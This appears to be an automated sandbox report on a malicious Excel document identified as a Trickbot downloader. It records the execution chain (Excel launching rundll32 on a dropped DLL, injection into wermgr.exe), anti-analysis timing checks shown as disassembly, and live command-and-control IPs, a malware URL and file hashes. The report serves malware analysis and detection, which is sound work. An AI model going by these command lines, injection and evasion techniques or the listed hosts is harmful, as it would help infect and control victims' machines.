Source: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | ReversingLabs: Detection: 25%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: unknown | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: unknown | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2092317965.000000006E8A9000.00000002.00020000.sdmp, BASE.BABAA.0.dr
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00811BD0 push dword ptr [edx+14h]; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00811C7A push dword ptr [edx+14h]; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00811CFD push dword ptr [edx+14h]; ret
Source: C:\Windows\System32\wermgr.exe | Code function: 6_2_0007D0F0 push 8B48D233h; iretd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\BASE.BABAA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (25 occurrences)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Source: C:\Windows\System32\wermgr.exe  Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,handleClosed,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\System32\wermgr.exe  RDTSC instruction interceptor: First address: 000000000006EAD0 second address: 000000000006EAD0 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0000E3AEh] 0x00000013 jmp 00007F61D886BE10h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov esi, edi 0x00000039 dec eax 0x0000003a xor esi, FFFFFF00h 0x00000040 dec ecx 0x00000041 and esi, edi 0x00000043 call 00007F61D8863CA6h 0x00000048 rdtsc
Source: C:\Windows\System32\wermgr.exe  Code function: 6_2_0006EAD0 rdtsc
Source: C:\Windows\System32\wermgr.exe  Code function: GetAdaptersInfo,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes
Source: C:\Windows\System32\wermgr.exe  Last function: Thread delayed
Source: C:\Windows\System32\wermgr.exe  Code function: 6_2_00061290 FindFirstFileW,
Source: C:\Windows\System32\wermgr.exe  Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW,
Source: C:\Windows\System32\wermgr.exe  Code function: 6_2_0006EAD0 rdtsc
Source: C:\Windows\System32\wermgr.exe  Code function: 6_2_00073070 LdrLoadDll,
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 4_2_6E89B044 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 4_2_6E897DE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\wermgr.exe  Code function: 6_2_00082060 SetTimer,RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe  Memory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe  Memory written: C:\Windows\System32\wermgr.exe base: 60000
Source: C:\Windows\SysWOW64\rundll32.exe  Memory written: C:\Windows\System32\wermgr.exe base: FFE493F8
Source: C:\Windows\System32\rundll32.exe  Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\BASE.BABAA,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe  Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: wermgr.exe, 00000006.00000002.2356139570.0000000000750000.00000002.00000001.sdmp  Binary or memory string: Program Manager
Source: wermgr.exe, 00000006.00000002.2356139570.0000000000750000.00000002.00000001.sdmp  Binary or memory string: Shell_TrayWnd
Source: wermgr.exe, 00000006.00000002.2356139570.0000000000750000.00000002.00000001.sdmp  Binary or memory string: !Progman
Source: C:\Windows\System32\wermgr.exe  Queries volume information: C:\ VolumeInformation

Stealing of Sensitive Information:

Yara detected Trickbot
Source: Yara match  File source: 00000004.00000003.2087111126.0000000000374000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.2087119613.0000000000374000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000002.2091202267.0000000000340000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000002.2091126228.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000002.2091382187.0000000000968000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 4.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 4.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Trickbot
Source: Yara match  File source: 00000004.00000003.2087111126.0000000000374000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000003.2087119613.0000000000374000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000002.2091202267.0000000000340000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000002.2091126228.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000004.00000002.2091382187.0000000000968000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 4.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 4.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting 21 | Path Interception | Access Token Manipulation 1 | Masquerading 121 | OS Credential Dumping | Security Software Discovery 12 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Process Injection 212 | Disable or Modify Tools 2 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 33 | Logon Script (Windows) | Extra Window Memory Injection 1 | Access Token Manipulation 1 | Security Account Manager | System Network Configuration Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 212 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting 21 | LSA Secrets | System Information Discovery 113 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue

                Behavior Graph

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

Source | Detection | Scanner | Label
SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls | 26% | ReversingLabs | Document-Word.Downloader.EncDoc

                Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes | 6% | ReversingLabs | Win32.Trojan.Trickpak
C:\Users\user\BASE.BABAA | 6% | ReversingLabs | Win32.Trojan.Trickpak

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/= | 0% | Avira URL Cloud | safe
http://www.chipmania.it/mails/open.php | 100% | Avira URL Cloud | malware
http://www.%s.comPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/ | 0% | Avira URL Cloud | safe

                Domains and IPs

                Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
chipmania.it | 185.81.0.78 | true | false | - | unknown
www.chipmania.it | unknown | unknown | false | - | unknown
api.ip.sb | unknown | unknown | false | - | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.chipmania.it/mails/open.php | true | Avira URL Cloud: malware | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmp | false | - | high
http://www.windows.com/pctv. | wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | false | - | high
http://investor.msn.com | rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | false | - | high
http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | wermgr.exe, 00000006.00000002.2361153381.00000000335D0000.00000002.00000001.sdmp | false | - | high
https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/= | wermgr.exe, 00000006.00000002.2356089312.000000000026E000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | false | - | high
http://www.%s.comPA | wermgr.exe, 00000006.00000002.2361153381.00000000335D0000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2093209344.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091598898.0000000002497000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361796624.0000000033BA7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2092708829.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2091417672.00000000022B0000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2361569025.00000000339C0000.00000002.00000001.sdmp | false | - | high
http://servername/isapibackend.dll | wermgr.exe, 00000006.00000002.2362129186.00000000341A0000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
https://200.52.147.93/rob60/377142_W617601.BB951803A213771AABBDF5CE6FB77EC0/5/file/ | wermgr.exe, 00000006.00000002.2356089312.000000000026E000.00000004.00000020.sdmp, wermgr.exe, 00000006.00000002.2356106081.000000000029A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

                                    Contacted IPs

                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false
200.52.147.93 | unknown | Honduras | 27932 | RedesyTelecomunicacionesHN | true

                                    General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 355602
Start date: 20.02.2021
Start time: 02:15:52
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 43s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: SecuriteInfo.com.Exploit.Siggen3.10350.12632.7055 (renamed file extension from 7055 to xls)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@9/7@3/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 12.3% (good quality ratio 7.7%)
• Quality average: 58.5%
• Quality standard deviation: 46.4%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
                                    Warnings:
                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 205.185.216.10, 205.185.216.42, 172.67.75.172, 104.26.12.31, 104.26.13.31
                                    • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net
                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/355602/sample/SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls

                                    Simulations

                                    Behavior and APIs

Time | Type | Description
02:16:42 | API Interceptor | 1x Sleep call for process: rundll32.exe modified
02:16:42 | API Interceptor | 8x Sleep call for process: wermgr.exe modified

                                    Joe Sandbox View / Context

                                    IPs

Match | Associated Sample Name / URL | Detection | Context
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.1476.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.1181.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.21235.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.15875.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.21759.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.2804.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.1138.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.11266.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | SecuriteInfo.com.Heur.18554.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | Sign-636.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | Sign-92793351_1597657581.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | Sign-979329054_1327186231.xls | malicious | www.chipmania.it/mails/open.php
185.81.0.78 | Sign-709986424_219667767.xls | malicious | www.chipmania.it/mails/open.php
200.52.147.93 | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | malicious | -
200.52.147.93 | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | -
200.52.147.93 | SecuriteInfo.com.Heur.1181.xls | malicious | -
200.52.147.93 | SecuriteInfo.com.Heur.1138.xls | malicious | -
200.52.147.93 | Sign-92793351_1597657581.xls | malicious | -
200.52.147.93 | Sign-707465831_1420670581.xls | malicious | -
200.52.147.93 | SecuriteInfo.com.Heur.22173.xls | malicious | -
200.52.147.93 | Sign_77624265-298090224.xls | malicious | -
200.52.147.93 | SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls | malicious | -
200.52.147.93 | SecuriteInfo.com.Exploit.Siggen3.10048.18756.xls | malicious | -
200.52.147.93 | SecuriteInfo.com.Heur.30904.xls | malicious | -
200.52.147.93 | P4fZLHrU6d.exe | malicious | -

                                                            Domains

Match | Associated Sample Name / URL | Detection | Context

                                                            ASN

Match | Associated Sample Name / URL | Detection | Context
RedesyTelecomunicacionesHN | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | malicious | 200.52.147.93
RedesyTelecomunicacionesHN | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | 200.52.147.93
RedesyTelecomunicacionesHN | SecuriteInfo.com.Heur.1181.xls | malicious | 200.52.147.93
RedesyTelecomunicacionesHN | SecuriteInfo.com.Heur.1138.xls | malicious | 200.52.147.93
RedesyTelecomunicacionesHN | Sign-92793351_1597657581.xls | malicious | 200.52.147.93
RedesyTelecomunicacionesHN | Sign-707465831_1420670581.xls | malicious | 200.52.147.93
RedesyTelecomunicacionesHN | SecuriteInfo.com.Heur.22173.xls | malicious | 200.52.147.93
RedesyTelecomunicacionesHN | Sign_77624265-298090224.xls | malicious | 200.52.147.93
RedesyTelecomunicacionesHN | SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls | malicious | 200.52.147.93
RedesyTelecomunicacionesHN | SecuriteInfo.com.Exploit.Siggen3.10048.18756.xls | malicious | 200.52.147.93
RedesyTelecomunicacionesHN | SecuriteInfo.com.Heur.30904.xls | malicious | 200.52.147.93
RedesyTelecomunicacionesHN | P4fZLHrU6d.exe | malicious | 200.52.147.93
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.1476.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.1181.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.21235.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.15875.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.21759.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.2804.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.1138.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.11266.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | SecuriteInfo.com.Heur.18554.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | Sign-636.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | Sign-92793351_1597657581.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | Sign-979329054_1327186231.xls | malicious | 185.81.0.78
SERVERPLAN-ASIT | Sign-709986424_219667767.xls | malicious | 185.81.0.78

JA3 Fingerprints

No context

Dropped Files

Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes
Associated Sample Name / URL, Detection:
• SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious
• SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious
• SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious
• SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious
• SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious
• SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious
• SecuriteInfo.com.Heur.1476.xls, Detection: malicious
• SecuriteInfo.com.Heur.1181.xls, Detection: malicious
• SecuriteInfo.com.Heur.21235.xls, Detection: malicious
• SecuriteInfo.com.Heur.15875.xls, Detection: malicious
• SecuriteInfo.com.Heur.21759.xls, Detection: malicious
• SecuriteInfo.com.Heur.2804.xls, Detection: malicious
• SecuriteInfo.com.Heur.1138.xls, Detection: malicious
• SecuriteInfo.com.Heur.11266.xls, Detection: malicious
• SecuriteInfo.com.Heur.18554.xls, Detection: malicious
• Sign-636.xls, Detection: malicious
• Sign-92793351_1597657581.xls, Detection: malicious
• Sign-979329054_1327186231.xls, Detection: malicious
• Sign-709986424_219667767.xls, Detection: malicious
• Sign-488964532_2104982999.xls, Detection: malicious
Context: none

Match: C:\Users\user\BASE.BABAA
Associated Sample Name / URL, Detection:
• SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious
• SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious
• SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious
• SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious
• SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious
• SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious
• SecuriteInfo.com.Heur.1476.xls, Detection: malicious
• SecuriteInfo.com.Heur.1181.xls, Detection: malicious
• SecuriteInfo.com.Heur.21235.xls, Detection: malicious
• SecuriteInfo.com.Heur.15875.xls, Detection: malicious
• SecuriteInfo.com.Heur.21759.xls, Detection: malicious
• SecuriteInfo.com.Heur.2804.xls, Detection: malicious
• SecuriteInfo.com.Heur.1138.xls, Detection: malicious
• SecuriteInfo.com.Heur.11266.xls, Detection: malicious
• SecuriteInfo.com.Heur.18554.xls, Detection: malicious
• Sign-636.xls, Detection: malicious
• Sign-92793351_1597657581.xls, Detection: malicious
• Sign-979329054_1327186231.xls, Detection: malicious
• Sign-709986424_219667767.xls, Detection: malicious
• Sign-488964532_2104982999.xls, Detection: malicious
Context: none

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: downloaded
Size (bytes): 4591104
Entropy (8bit): 5.0540147937501265
Encrypted: false
SSDEEP: 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
MD5: 25056DF6D3546DE971EAFE5DA5F9AE44
SHA1: 179555B3D0391E45DF29E651B8ED0342D02FE88A
SHA-256: AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
SHA-512: 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 6%
Joe Sandbox View:
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious
